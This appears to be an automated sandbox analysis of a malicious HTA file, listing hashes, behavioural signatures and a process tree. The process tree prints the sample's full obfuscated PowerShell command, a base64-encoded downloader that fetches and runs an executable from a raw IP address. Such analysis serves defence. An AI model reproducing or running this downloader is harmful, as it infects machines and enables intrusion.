Analysis
-
max time kernel
98s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
13-06-2024 17:28
Static task
static1
Behavioral task
behavioral1
Sample
3371aa45b44d7065089695960d94e028.hta
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
3371aa45b44d7065089695960d94e028.hta
Resource
win10v2004-20240611-en
General
-
Target
3371aa45b44d7065089695960d94e028.hta
-
Size
34KB
-
MD5
3371aa45b44d7065089695960d94e028
-
SHA1
77f7d123f864ba762b813efa8e1d4c6abfaceee4
-
SHA256
28499696b10d24ae8686b10f6afce67f6357d11490dd4a76a7e4a671a16d4ea6
-
SHA512
24c547b7e6bd197b5d829166341e9483657571bad5023baf0d02eb87c158cdcd2a58bae8d8d1db33db5f6faa582a325c05f09ca284ea5ee8441e114fff149aae
-
SSDEEP
96:40xsXYxvOsXvQ645fUfr8jmaTWJrwvQ0aDG/ratntYe1a0aOsXEtONQ:403hfP45f65sQ7DG/ratNM7gONQ
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 14 2232 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2232 powershell.exe 2232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2232 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
mshta.execmd.exepowershell.execsc.exedescription pid process target process PID 656 wrote to memory of 1316 656 mshta.exe cmd.exe PID 656 wrote to memory of 1316 656 mshta.exe cmd.exe PID 656 wrote to memory of 1316 656 mshta.exe cmd.exe PID 1316 wrote to memory of 2232 1316 cmd.exe powershell.exe PID 1316 wrote to memory of 2232 1316 cmd.exe powershell.exe PID 1316 wrote to memory of 2232 1316 cmd.exe powershell.exe PID 2232 wrote to memory of 4460 2232 powershell.exe csc.exe PID 2232 wrote to memory of 4460 2232 powershell.exe csc.exe PID 2232 wrote to memory of 4460 2232 powershell.exe csc.exe PID 4460 wrote to memory of 3928 4460 csc.exe cvtres.exe PID 4460 wrote to memory of 3928 4460 csc.exe cvtres.exe PID 4460 wrote to memory of 3928 4460 csc.exe cvtres.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3371aa45b44d7065089695960d94e028.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c POweRSHeLl.ExE -eX bYpaSs -nOP -w 1 -c DEvICEcREDentIAlDepLoyMent ; iEx($(Iex('[SySTEM.TEXT.enCodiNG]'+[ChaR]0X3A+[chAr]58+'uTf8.GetsTRINg([sysTem.CONvERT]'+[ChAr]0X3a+[CHAR]58+'frOMbASe64STRInG('+[cHar]0X22+'JHpsNEZhICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUmRFRmluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVWVmZHUmVnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWElRa3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLc05FdFcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmJqcXJzTmlzWWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRnRUF6aENKWlUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpsNEZhOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjcuMjA3LjE2Ni4xNzUvTTEwMDZUL2xzYXNzLmV4ZSIsIiRlTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYXJ0LXNMRWVQKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chaR]34+'))')))"2⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOweRSHeLl.ExE -eX bYpaSs -nOP -w 1 -c DEvICEcREDentIAlDepLoyMent ; iEx($(Iex('[SySTEM.TEXT.enCodiNG]'+[ChaR]0X3A+[chAr]58+'uTf8.GetsTRINg([sysTem.CONvERT]'+[ChAr]0X3a+[CHAR]58+'frOMbASe64STRInG('+[cHar]0X22+'JHpsNEZhICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlUmRFRmluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxtb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVWVmZHUmVnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWElRa3Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLc05FdFcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmJqcXJzTmlzWWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRnRUF6aENKWlUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpsNEZhOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNjcuMjA3LjE2Ni4xNzUvTTEwMDZUL2xzYXNzLmV4ZSIsIiRlTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYXJ0LXNMRWVQKDMpO3NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chaR]34+'))')))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zi5zlzvz\zi5zlzvz.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5A4.tmp" "c:\Users\Admin\AppData\Local\Temp\zi5zlzvz\CSC1316B25F802F407BA87462B92B31869.TMP"5⤵PID:3928
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c7d831fd91720b12824ffe4b3726494d
SHA1c7836409554e8f951577d9f6956c1d2f666582aa
SHA256c27a6c789f111196b6c0eb3746288cb2273faca9c1bf5ef644e110e24ce113b5
SHA5128050a4bffd40221daa4374335fd30c198716419789991ae3774defab5b5bf6ff9eb514557452a4c337e6cf7811e90cb7c734066ab477a0ac89bbe31db6409c52
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD575e9cab93cc07af3837b935e3cbb8a0f
SHA175e4ddc1f76371dcc29236993323d81f9d82a7b6
SHA256ee87eafe00c88b35258c28375d8e953577fa137dc7da3e8476e50134988a785e
SHA51248cced328308a645fb867fc31a6149b4b16aaa2c34db18ddff6213cf62131dddd5d352eefc7eafe15c81a2cda002d6ebdad051fd629debf679fa1d09997219f4
-
Filesize
652B
MD54630761f2863f496dd246f006083f047
SHA1ef6e789ebaab1cafd24d41e49a00ef70c15deb0c
SHA256784eaecd9c7980d27cc580b8495de46979cb86b8d9728b721ae06383eb2bc087
SHA5122f599a10c9bd260f11c78a73387c65898abe1afdad54b478e5f5be31137788582c434580585267dab02c513ec1199fdc0b87f849804f075e6415645da2bc256c
-
Filesize
456B
MD5b482306a1ee20f92189f3cbcd699aba3
SHA142d499137c52fa5bed274ae4942b089dbf025119
SHA256ca429dae59619b584c51f3eb7f070e425308c373ebe32222679ead6b9ca4f706
SHA51247f9add1109662cd59843fed68a72edbbc13da41fd1757f8fbd5ea46aa70eb43b87865d903505a50b1b2419b41eb40878cce4eeb9ce6c2587a4e028e93e527c5
-
Filesize
369B
MD5558dd96f4c38752068835a99c9ba819e
SHA14d207c44bfe421a592694b2a0bb4fcf6ae25b00b
SHA2566a57846819e1d16973eb43120ecaeaa62bdd76ffb1bae5f3a7db923607aad59a
SHA51250a3f5aab23042216be3db5d7e19dcb88243cdaf1a4524d953c7ce8957a2530ce8d2110a12a73c2d4c5b2b82e62641cff0cb2f4f3dbd268bebe65ec09e234b4f